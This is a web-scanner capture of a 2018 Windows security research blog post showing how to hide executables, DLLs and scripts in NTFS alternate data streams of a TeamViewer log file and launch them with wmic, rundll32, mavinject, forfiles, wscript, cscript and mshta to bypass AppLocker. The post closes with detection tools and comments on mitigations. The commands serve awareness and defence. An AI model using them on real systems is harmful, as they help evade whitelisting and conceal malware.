oddvar.moe
Open in
urlscan Pro
192.0.78.24
Public Scan
URL:
https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Submission: On October 10 via api from BE — Scanned from DE
Submission: On October 10 via api from BE — Scanned from DE
Form analysis 4 forms found in the DOM
POST https://oddvar.moe/wp-comments-post.php
<form action="https://oddvar.moe/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate="">
<div id="comment-form__verbum" class="transparent"></div>
<div class="verbum-form-meta"><input type="hidden" name="comment_post_ID" value="4249" id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
<input type="hidden" name="highlander_comment_nonce" id="highlander_comment_nonce" value="0bb63a8e52">
</div>
<p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="ff42db56ce"></p>
<p style="display: none !important;"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="1696951332705">
<script>
document.getElementById("ak_js_1").setAttribute("value", (new Date()).getTime());
</script>
</p>
</form>GET https://oddvar.moe/
<form role="search" method="get" class="search-form" action="https://oddvar.moe/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Search …" value="" name="s">
</label>
<input type="submit" class="search-submit" value="Search">
</form>POST https://subscribe.wordpress.com
<form method="post" action="https://subscribe.wordpress.com" accept-charset="utf-8" style="display: none;">
<div class="actnbr-follow-count">Join 41 other followers</div>
<div>
<input type="email" name="email" placeholder="Enter your email address" class="actnbr-email-field" aria-label="Enter your email address">
</div>
<input type="hidden" name="action" value="subscribe">
<input type="hidden" name="blog_id" value="138193392">
<input type="hidden" name="source" value="https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/">
<input type="hidden" name="sub-type" value="actionbar-follow">
<input type="hidden" id="_wpnonce" name="_wpnonce" value="32dc478c7c">
<div class="actnbr-button-wrap">
<button type="submit" value="Sign me up"> Sign me up </button>
</div>
</form><form id="jp-carousel-comment-form">
<label for="jp-carousel-comment-form-comment-field" class="screen-reader-text">Write a Comment...</label>
<textarea name="comment" class="jp-carousel-comment-form-field jp-carousel-comment-form-textarea" id="jp-carousel-comment-form-comment-field" placeholder="Write a Comment..."></textarea>
<div id="jp-carousel-comment-form-submit-and-info-wrapper">
<div id="jp-carousel-comment-form-commenting-as">
<fieldset>
<label for="jp-carousel-comment-form-email-field">Email (Required)</label>
<input type="text" name="email" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-email-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-author-field">Name (Required)</label>
<input type="text" name="author" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-author-field">
</fieldset>
<fieldset>
<label for="jp-carousel-comment-form-url-field">Website</label>
<input type="text" name="url" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-url-field">
</fieldset>
</div>
<input type="submit" name="submit" class="jp-carousel-comment-form-button" id="jp-carousel-comment-form-button-submit" value="Post Comment">
</div>
</form>Text Content
Skip to content
Menu
* Home
* About
* Presentations
* Articles
* AppLocker Case study
* AppLocker – Case study – Part 1
* AppLocker – Case study – Part 2
* AppLocker – Hardening – Part 1
* AppLocker – Hardening – Part 2
* AppLocker for admins – Does it work?
* Bypassing AppLocker as an admin
* AppLocker – Making sure that local rules are removed
* Real whitelisting attempt using AppLocker
* Ultimate AppLocker Bypass List
Oddvar Moe's Blog
Notes from My adventures with Windows security
PUTTING DATA IN ALTERNATE DATA STREAMS AND HOW TO EXECUTE IT
Posted on 14 Jan 201829 Aug 2018 by Oddvar Moe [MVP]
Part 2 of this research can be found
here: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
I always had a fascination about ADS (Alternate data streams) and using it as
part of a persistence. My first meeting with this as a persistence technique was
when Matt Nelson aka @Enigma0x3 wrote a blogpost about using
it: https://enigma0x3.net/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/
Quite recently I have started to play with AppLocker bypasses to create a tool
and somehow I saw a shiny thing that I just had to look at. I did a normal check
on my AppLocker test system using Accesschk.exe and discovered a writable file
within the Teamviewer folder.
A log file to be exact. This lead me to the discovery that you can inject data
into the alternate stream of that file, execute it and it will work as an
AppLocker bypass.
I posted a tweet about this
here: https://twitter.com/Oddvarmoe/status/951757732557852673
(Kudos to TeamViewer for looking into the issue from their side)
Here is a screenshot of the bypass I found:
So what I did was that I first injected the payload into the ADS of the log file
using this command:
"type c:\temp\bginfo.exe > "C:\program files (x86)\Teamviewer\TeamViewer12_Logfile.log:bginfo.exe"
Then I used the following command to execute it:
"wmic process call create '"C:\program files (x86)\Teamviewer\TeamViewer12_Logfile.log:bginfo.exe"'
After I was done looking at this bypass I got even more curious. What sort of
other processes are able to execute from ADS?
I did some Googling around ADS and found out that back in the days you could
use:
start c:\folder\file.exe:ADSStream.exe
to launch executables from ADS.
This is now blocked.
After some testing, searching and playing around I figured out the following,
are at least possible to execute from ADS (And I am sure that there are hundreds
more as well):
rundll32.exe
type "C:\temp\messagebox64.dll" > "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll"
rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
Mavinject.exe
c:\windows\SysWOW64\notepad.exe
tasklist | findstr notepad
type C:\temp\AtomicTest.dll > ""C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
C:\windows\WinSxS\wow64_microsoft-Windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
Forfiles.exe
In my testing forfiles is not very fond of spaces in paths. So it seems you have
to use the 8.3 foldername for some reason.
forfiles /P C:\windows\system32 /m notepad.exe /c "c:\Progra~2\Teamviewer\TeamViewer13_Logfile.log:bginfo2.exe"
Wscript.exe
type "C:\Program Files\test\wscripthello.vbs" > "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:wscripts.vbs"
wscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:wscripts.vbs"
Cscript.exe
cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:wscripts.vbs"
MSHTA.exe
type C:\temp\helloworld.hta > wscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
I am pretty sure this is not everything that can execute from ADS. This is just
some examples I found pretty fast while playing with it. My point with this post
is to raise awareness of Alternate data streams. If you are not checking for
malicious activity within ADS of your files/folders I suggest you start. Thats
it.
Update 18.01.2018:
I added these methods to a GIST found
here: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Will try to keep it updated when I discover new methods.
I was also asked a lot about how to detect these alternate data streams. There
are several utilities to view ADS.
Dir /r c:\fileorfolder
https://docs.microsoft.com/en-us/sysinternals/downloads/streams
https://www.nirsoft.net/utils/alternate_data_streams.html
Sysmon also offers some monitoring of ADS AFAIK.
https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
https://twitter.com/SwiftOnSecurity/status/952659933836791808
There are also some PowerShell scripts that can be used.
https://github.com/forgottentq/powershell/blob/master/find-steams.ps1
https://github.com/p0shkatz/Get-ADS
Cheers!
Update 29.08.2018:
Another great resource on ADS written by Marc Ochsenmeier can be found
here: https://winitor.com/pdf/NtfsAlternateDataStreams.pdf
SHARE THIS:
* Twitter
* Facebook
*
LIKE THIS:
Like Loading...
RELATED
A small discovery about AppLocker29 May 2019In "Security"
Bypassing AppLocker as an admin1 Feb 2019In "Security"
AppLocker – Case study – How insecure is it really? – Part 113 Dec 2017In
"Security"
Tagged ADS, AppLocker, bypass, hacking, research
POST NAVIGATION
Previous Post Office 365 Safe links bypass
Next Post Windows Defender Attack Surface Reduction Rules bypass
14 THOUGHTS ON “PUTTING DATA IN ALTERNATE DATA STREAMS AND HOW TO EXECUTE IT”
1. Fred Speece says:
15 Jan 2018 at 9:17 pm
Anything we can do about this bypass? Any mitigations?
LikeLike
Reply
1. Oddvar Moe [MVP] says:
15 Jan 2018 at 9:48 pm
There is no such thing that disables ADS. What I would recommend is to
try to monitor your systems for insertion or presence of ADS data in
your files.
Sysmon (free util from MS) has the option to log this.
LikeLike
Reply
2. Pingback: Loading Alternate Data Stream (ADS) DLL/CPL Binaries to Bypass
AppLocker | | bohops |
3. Pingback: Putting data in Alternate data streams and how to execute it –
part 2 – Oddvar Moe's Blog
4. Pingback: Putting data in Alternate data streams and how to execute it –
Information Security Outsider
5. altstrix says:
13 Jul 2018 at 3:52 pm
the first example you have is hiding an executable file in an ADS, and then
executing it through WMIC, but whenever I tried this on my own machine, I
noticed that nothing actually happened. I’d get the same message you got,
where it said it got a return value of 9, but nothing would actually start.
I don’t know if there’s something I missed, so please let me know. I want
to be able to replicate this, but until I can, I’m not gonna panic
LikeLike
Reply
1. Oddvar Moe [MVP] says:
23 Jul 2018 at 10:21 am
AFAIK there has been some changes to Windows and WMIC. I think they may
have stopped this way of executing. I will check to verify.
LikeLike
Reply
6. test says:
20 Feb 2019 at 10:26 am
are you sure that your hta from ADS is your hello world HTA? i mean, mshta
can open empty template if path to hta file is incorrect. i tried to open
hta with text through ads and it opens only empty page. so maybe mshta
doesnt really open from ads? what you think about it?
LikeLike
Reply
1. Oddvar Moe [MVP] says:
20 Feb 2019 at 10:31 am
Could be that it has changed… I will check. Thanks for the info
LikeLike
Reply
7. Pingback: A small discovery about AppLocker – Oddvar Moe's Blog
8. Pingback: Attack Detection Fundamentals: Code Execution and Persistence –
Lab #1 – TerabitWeb Blog
9. Pingback: Attack Detection Fundamentals: Code Execution and Persistence -
Lab #1
10. Pingback: RED TEAMING_Final Att&ck – B4cKD00₹
11. Pingback: Alternate Data Stream (ADS) Experiments – Catch22
LEAVE A REPLY CANCEL REPLY
Δ
This site uses Akismet to reduce spam. Learn how your comment data is processed.
* Facebook
* LinkedIn
* Twitter
Search for:
Website Powered by WordPress.com.
* Follow Following
* Oddvar Moe's Blog
Join 41 other followers
Sign me up
* Already have a WordPress.com account? Log in now.
* * Oddvar Moe's Blog
* Customize
* Follow Following
* Sign up
* Log in
* Copy shortlink
* Report this content
* View post in Reader
* Manage subscriptions
* Collapse this bar
Loading Comments...
Write a Comment...
Email (Required) Name (Required) Website
%d bloggers like this: